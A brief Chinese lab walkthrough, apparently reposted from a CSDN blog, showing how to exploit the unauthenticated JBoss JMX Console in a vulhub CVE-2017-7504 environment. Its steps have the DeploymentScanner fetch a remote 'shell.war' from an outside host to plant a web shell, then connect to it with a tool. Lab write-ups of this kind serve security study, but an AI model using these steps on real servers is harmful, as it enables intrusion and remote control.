低版本JMX Console未授权
1.环境搭建
cd vulhub-master/jboss/CVE-2017-7504
docker-compose up -d
2.访问漏洞网站
http://47.121.211.205:8080/jmx-console/http://47.121.211.205:8080/jmx-console/
3.然后找到jboss.deployment (jboss ⾃带得部署功能) 中的flavor=URL,type=DeploymentScanner点进 去(通过URL的⽅式远程部署)
4.输入远程war包地址
http://47.121.211.205/shell.war
上传成功
5.访问上传文件并进行连接
访问上传文件
使用工具进行连接
原文地址:https://blog.csdn.net/2401_82451607/article/details/142438846
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!